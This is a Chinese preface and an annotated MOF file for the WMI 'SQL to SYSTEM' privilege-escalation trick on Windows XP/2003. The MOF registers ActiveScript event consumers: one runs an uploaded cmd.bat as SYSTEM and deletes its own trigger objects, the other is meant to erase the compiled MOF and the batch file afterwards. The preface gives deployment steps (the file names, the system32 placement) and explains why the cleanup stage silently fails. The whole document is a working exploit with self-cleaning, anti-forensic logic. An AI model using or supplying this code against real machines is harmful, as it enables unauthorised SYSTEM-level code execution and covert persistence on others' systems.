这个 SQL 提权 MOF 只能执行 system32 目录下的文件，脚本里不能指定路径：MOF 中引用的 cmd.bat 和 wbem\mof\good\hBsBa.mof 都是相对路径，由 WMI 服务（工作目录应为 %SystemRoot%\system32）解析。需要把要执行的命令写进 cmd.bat，上传到 system32 目录，再把这个 MOF 以 hBsBa.mof 为文件名放进 system32\wbem\mof\ 交给 WMI 自动编译执行。注意两点：清理脚本是按 hBsBa.mof 这个文件名删除编译后的副本，改名后清理会失败；qndfilt 过滤器匹配的进程名是 cmd.bat，而批处理实际由 cmd.exe 承载，所以按现在的写法清理消费者从不触发，cmd.bat、hBsBa.mof 以及 qndfilt/qndASEC 对象都会残留在目标机上（对防守方是明显的取证痕迹）。另外 wbem\mof 目录的自动编译只存在于 Windows XP/2003。
// MOF for the "SQL -> SYSTEM" WMI privilege-escalation trick.  The WMI service
// compiles everything below into root\cimv2 and runs the two JScript bodies
// through the ActiveScript event consumer.  All file paths inside the scripts
// are relative (cmd.bat, wbem\mof\good\hBsBa.mof), so the batch file must sit
// in system32 and this MOF must be dropped under the name hBsBa.mof for the
// cleanup stage to find its compiled copy.
#pragma namespace("\\\\.\\root\\cimv2")

// Dummy class.  Creating an instance of it (last statement of this file) is
// the __InstanceCreationEvent that fires "instfilt" and thereby runs cmd.bat.
class MyClass547
{
    [key] string Name;
};

// Script consumer class, backed by the built-in ActiveScript provider
// registered below.  ScriptText is run by the named ScriptingEngine whenever a
// filter bound to an instance of this class fires.
class ActiveScriptEventConsumer : __EventConsumer
{
    [key] string Name;
    [not_null] string ScriptingEngine;
    string ScriptFileName;
    [template] string ScriptText;
    uint32 KillTimeout;
};

// Provider registration for ActiveScriptEventConsumer.
instance of __Win32Provider as $P
{
    Name = "ActiveScriptEventConsumer";
    CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
    PerUserInitialization = TRUE;
};

instance of __EventConsumerProviderRegistration
{
    Provider = $P;
    ConsumerClassNames = {"ActiveScriptEventConsumer"};
};

// Stage 1 (payload): runs cmd.bat through WScript.Shell -- relative path, so
// it resolves against the WMI service's working directory -- then deletes its
// own trigger objects (MyClass547, instfilt, ASEC) so the first stage does not
// persist in the repository.  Every step is wrapped in try/catch, so any
// failure is silent; there is no feedback to the operator.
Instance of ActiveScriptEventConsumer as $cons
{
    Name = "ASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};

// Stage 2 (cleanup): deletes the compiled copy of this MOF
// (wbem\mof\good\hBsBa.mof -- hence the fixed file name), deletes cmd.bat and
// removes qndfilt/qndASEC.  Intended to run once the payload process has gone
// away; whether it ever runs depends on $Filt2 below.
Instance of ActiveScriptEventConsumer as $cons2
{
    Name = "qndASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};

// Trigger for stage 1: any new instance whose class is MyClass547.  Only the
// class is checked, so the Name given to the instance at the bottom is
// irrelevant.
instance of __EventFilter as $Filt
{
    Name = "instfilt";
    Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";
    QueryLanguage = "WQL";
};

// Trigger for stage 2: polls every second (WITHIN 1) for a Win32_Process
// named "cmd.bat" disappearing.
// NOTE(review): a batch file started through WScript.Shell.Run is hosted by
// cmd.exe, so the Win32_Process Name seen by WMI is "cmd.exe", not
// "cmd.bat".  As written this filter never matches, $cons2 never runs, and
// cmd.bat, the compiled hBsBa.mof and the qndfilt/qndASEC objects are left
// behind on disk and in the WMI repository -- a persistent forensic artifact
// on the target.
instance of __EventFilter as $Filt2
{
    Name = "qndfilt";
    Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";
    QueryLanguage = "WQL";
};

// Wire filters to consumers.  Bindings must exist before the MyClass547
// instance below is created, otherwise the creation event has no subscriber.
instance of __FilterToConsumerBinding as $bind
{
    Consumer = $cons;
    Filter = $Filt;
};

instance of __FilterToConsumerBinding as $bind2
{
    Consumer = $cons2;
    Filter = $Filt2;
};

// Final statement: creating this instance is the event that starts stage 1.
instance of MyClass547 as $MyClass
{
    Name = "ClassConsumer";
};